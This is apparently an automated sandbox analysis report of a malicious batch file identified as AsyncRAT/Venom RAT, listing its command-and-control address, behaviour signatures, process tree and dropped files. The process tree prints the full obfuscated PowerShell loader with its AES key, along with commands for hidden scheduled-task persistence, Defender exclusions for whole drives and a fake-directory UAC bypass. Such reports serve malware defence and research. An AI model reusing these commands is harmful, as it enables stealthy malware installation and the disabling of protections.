Analysis

  • max time kernel
    133s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2024 01:32

General

  • Target

    InjectorStarter.bat

  • Size

    167KB

  • MD5

    46d96a835e60ee73339082c3c7eb62cc

  • SHA1

    b9c668ea33db469cd1ed60bd8d31e5347975a72c

  • SHA256

    c11831adced48656b92417fa594e4037d1f42194cd134fef31f52e6cd4b35d4a

  • SHA512

    ca6705fb45e3712004702d903733cfd0dc91b63d0a41a6bb0531e18bedb6c57de8486f4e27aa8fff66c44acbcf2fad6a3b5267e9b69c144df917105e9c257497

  • SSDEEP

    3072:rKTAIOdL6ZlESFX0Wb8s7CqRa8gZbN8/Z2LfvTijJij6wTKGJWD:tlumcVb8sOqRbgA/Cf8+6Sq

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

C2

41.216.183.109:4449

Mutex

eqrgkllk45thea

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\InjectorStarter.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4508
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wGRUA3G1Id5Yrl+/tKZd770scSjou27cv5oSvt7BwaQ='); $aes_var.IV=[System.Convert]::FromBase64String('Y2EA3S2a60w++GUnYA46Lg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GkmdP=New-Object System.IO.MemoryStream(,$param_var); $hiwNw=New-Object System.IO.MemoryStream; $GuFCf=New-Object System.IO.Compression.GZipStream($GkmdP, [IO.Compression.CompressionMode]::Decompress); $GuFCf.CopyTo($hiwNw); $GuFCf.Dispose(); $GkmdP.Dispose(); $hiwNw.Dispose(); $hiwNw.ToArray();}function execute_function($param_var,$param2_var){ $PazRF=[System.Reflection.Assembly]::Load([byte[]]$param_var); $SUZbj=$PazRF.EntryPoint; $SUZbj.Invoke($null, $param2_var);}$ZeAWF = 'C:\Users\Admin\AppData\Local\Temp\InjectorStarter.bat';$host.UI.RawUI.WindowTitle = $ZeAWF;$dobXh=[System.IO.File]::ReadAllText($ZeAWF).Split([Environment]::NewLine);foreach ($YQfVl in $dobXh) { if ($YQfVl.StartsWith('LUChidbwYzZpSAhDIbmN')) { $UhuSz=$YQfVl.Substring(20); break; }}$payloads_var=[string[]]$UhuSz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      2⤵
        PID:3616
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:440
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3548
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5100
          • C:\Windows \System32\ComputerDefaults.exe
            "C:\Windows \System32\ComputerDefaults.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2488
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c SC.cmd
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2188
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wGRUA3G1Id5Yrl+/tKZd770scSjou27cv5oSvt7BwaQ='); $aes_var.IV=[System.Convert]::FromBase64String('Y2EA3S2a60w++GUnYA46Lg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GkmdP=New-Object System.IO.MemoryStream(,$param_var); $hiwNw=New-Object System.IO.MemoryStream; $GuFCf=New-Object System.IO.Compression.GZipStream($GkmdP, [IO.Compression.CompressionMode]::Decompress); $GuFCf.CopyTo($hiwNw); $GuFCf.Dispose(); $GkmdP.Dispose(); $hiwNw.Dispose(); $hiwNw.ToArray();}function execute_function($param_var,$param2_var){ $PazRF=[System.Reflection.Assembly]::Load([byte[]]$param_var); $SUZbj=$PazRF.EntryPoint; $SUZbj.Invoke($null, $param2_var);}$ZeAWF = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $ZeAWF;$dobXh=[System.IO.File]::ReadAllText($ZeAWF).Split([Environment]::NewLine);foreach ($YQfVl in $dobXh) { if ($YQfVl.StartsWith('LUChidbwYzZpSAhDIbmN')) { $UhuSz=$YQfVl.Substring(20); break; }}$payloads_var=[string[]]$UhuSz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                6⤵
                  PID:5012
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                  6⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:4820
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3236
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1296
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1676
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4028
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:232
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
            3⤵
              PID:5032
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\InjectorStarter')
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1712
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2924
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4112

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          3f01549ee3e4c18244797530b588dad9

          SHA1

          3e87863fc06995fe4b741357c68931221d6cc0b9

          SHA256

          36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

          SHA512

          73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

          Filesize

          53KB

          MD5

          a26df49623eff12a70a93f649776dab7

          SHA1

          efb53bd0df3ac34bd119adf8788127ad57e53803

          SHA256

          4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

          SHA512

          e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

          Filesize

          2KB

          MD5

          005bc2ef5a9d890fb2297be6a36f01c2

          SHA1

          0c52adee1316c54b0bfdc510c0963196e7ebb430

          SHA256

          342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

          SHA512

          f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

          Filesize

          2KB

          MD5

          e4de99c1795fd54aa87da05fa39c199c

          SHA1

          dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

          SHA256

          23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

          SHA512

          796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          4373abae4880a277a3859f5734143a19

          SHA1

          a71759a565541fba5e1ee8d3fceee7645ed75054

          SHA256

          f151ef7e7996f479ba2ab9334d50ff36ae85917c4451614a254b121d328eb607

          SHA512

          0af72c0f2ff8716e99a84e67ef4bb921e389459b90f76ca17340384aabcdf41a10c2191801c8d343b649cb547ea8182ca367b7aa6176d7304394be4b9bfe8718

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          81b640502b0c25ab216c6b6ad82ba7bd

          SHA1

          1b43e1fead8428aee3b764bcacc3795021277be9

          SHA256

          4cf92d978f2a1fc5b80eda8a11f181603018d270fc8fe24daa634b954c75380f

          SHA512

          842cfba04ddbd5336e16dbc1ab8e57a80541f0ab1da6260fcca53f7f441e4b1c4149bce2d74b23684a338a86aded2626008f33edb246871e178bda1272c8fa57

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          c4bac001ce1ea76036b69ef6920fffe1

          SHA1

          ce176b38f2ee4b300cbec04592f70b65b45491ed

          SHA256

          2895ccfe721a7d966bb407b4bb713320d3fb11ceb793fcc84a751abb755ca1c6

          SHA512

          e8616fb64a420202573cad3253b5714816b09522c8f466d0a42b77701d911146f501e3ec06e0b7d79f56d42ea2cc25c642ff64f57242bb609db039484b12ddc3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          721b5709e8cf707b3371e9dcec3f8dbe

          SHA1

          dca34cbf05583bd4ee731e732c0ff993eb4cfd13

          SHA256

          df5a6fc77d68de7db1bc06f5f1f9609fb27df5ee90d57f7766860cb3bef14f43

          SHA512

          ffcdce04c34fe269f898e599b95fff2306f9ab5e68e0255cb4c80cffedf262a0567b563317a94110e9f10467a5a340a71da83d0439b37d9e83ce76c5def8ca3d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          73aa7bac9a76981286ae4d6ac4734b2d

          SHA1

          6deb0456dbe856792c66e803427b599311fdda23

          SHA256

          84397e930607b63ba9cfe6c4a4c472eb66d074526b8fe48d15856bc1a649aba6

          SHA512

          0dcc91f38e59259a4217b27746a66b7a6dec07ade9478fcbdedcd21eecbf584175a2e12d48ea6945ddfa81ee24dd0de17b154225f32aaed7f730bf64474745d9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          664B

          MD5

          c5a924d29f846b1d81e3c4df6cf310d0

          SHA1

          e0cfbbf4666d649d229322c82ae6c1f3dda6c63a

          SHA256

          a08aca12c8c39b70f38089a2009f7db55afaeb928eda54436a65ebfa9539e66d

          SHA512

          f2a292dbb2c6e37d4adee20a1172f445fbf965dcea89e37827b84eb569a1045ee359267d5e6c7b326dcfbacbd96e410d4b6cdbdcd82a9d359501208415ed1158

        • C:\Users\Admin\AppData\Local\Temp\SC.cmd

          Filesize

          167KB

          MD5

          46d96a835e60ee73339082c3c7eb62cc

          SHA1

          b9c668ea33db469cd1ed60bd8d31e5347975a72c

          SHA256

          c11831adced48656b92417fa594e4037d1f42194cd134fef31f52e6cd4b35d4a

          SHA512

          ca6705fb45e3712004702d903733cfd0dc91b63d0a41a6bb0531e18bedb6c57de8486f4e27aa8fff66c44acbcf2fad6a3b5267e9b69c144df917105e9c257497

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uvwp3lkm.nte.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

          Filesize

          8B

          MD5

          cf759e4c5f14fe3eec41b87ed756cea8

          SHA1

          c27c796bb3c2fac929359563676f4ba1ffada1f5

          SHA256

          c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

          SHA512

          c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

        • C:\Windows \System32\ComputerDefaults.exe

          Filesize

          80KB

          MD5

          d25a9e160e3b74ef2242023726f15416

          SHA1

          27a9bb9d7628d442f9b5cf47711c906e3315755b

          SHA256

          7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c

          SHA512

          bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910

        • C:\Windows \System32\MLANG.dll

          Filesize

          103KB

          MD5

          d4f7ff46bb9412b90e8f091f6a9115c3

          SHA1

          e7c82eca0bd2c9969b036efd07bfb6a1e3a342cd

          SHA256

          53493edddf3e4509f791d0e26ea80d8b2283aa95a0f4e263ebb8fc1e7d8d9c82

          SHA512

          7bf7a9424f8540d4f867c53c3042fc91c7c4bf09f8c790d664908c61cce3d32a16fa286fff2d5b9aed3c25f645fdba50a2c91030eea9da1e8e7215c414e32a0d

        • memory/440-80-0x00007FFE70683000-0x00007FFE70685000-memory.dmp

          Filesize

          8KB

        • memory/440-10-0x0000022CA5730000-0x0000022CA5752000-memory.dmp

          Filesize

          136KB

        • memory/440-33-0x00007FFE8E650000-0x00007FFE8E70E000-memory.dmp

          Filesize

          760KB

        • memory/440-0-0x00007FFE70683000-0x00007FFE70685000-memory.dmp

          Filesize

          8KB

        • memory/440-161-0x00007FFE70680000-0x00007FFE71141000-memory.dmp

          Filesize

          10.8MB

        • memory/440-31-0x0000022CA5790000-0x0000022CA57A0000-memory.dmp

          Filesize

          64KB

        • memory/440-32-0x00007FFE8F0F0000-0x00007FFE8F2E5000-memory.dmp

          Filesize

          2.0MB

        • memory/440-13-0x0000022CA5B40000-0x0000022CA5B84000-memory.dmp

          Filesize

          272KB

        • memory/440-30-0x0000022CA5780000-0x0000022CA5788000-memory.dmp

          Filesize

          32KB

        • memory/440-81-0x00007FFE70680000-0x00007FFE71141000-memory.dmp

          Filesize

          10.8MB

        • memory/440-11-0x00007FFE70680000-0x00007FFE71141000-memory.dmp

          Filesize

          10.8MB

        • memory/440-34-0x0000022CA5AF0000-0x0000022CA5B10000-memory.dmp

          Filesize

          128KB

        • memory/440-14-0x0000022CA5C10000-0x0000022CA5C86000-memory.dmp

          Filesize

          472KB

        • memory/440-12-0x00007FFE70680000-0x00007FFE71141000-memory.dmp

          Filesize

          10.8MB

        • memory/3548-24-0x00007FFE70680000-0x00007FFE71141000-memory.dmp

          Filesize

          10.8MB

        • memory/3548-25-0x00007FFE70680000-0x00007FFE71141000-memory.dmp

          Filesize

          10.8MB

        • memory/3548-26-0x00007FFE70680000-0x00007FFE71141000-memory.dmp

          Filesize

          10.8MB

        • memory/3548-29-0x00007FFE70680000-0x00007FFE71141000-memory.dmp

          Filesize

          10.8MB

        • memory/4820-118-0x00000234FC190000-0x00000234FC1A8000-memory.dmp

          Filesize

          96KB

        • memory/4820-67-0x00007FFE8F0F0000-0x00007FFE8F2E5000-memory.dmp

          Filesize

          2.0MB

        • memory/4820-68-0x00007FFE8E650000-0x00007FFE8E70E000-memory.dmp

          Filesize

          760KB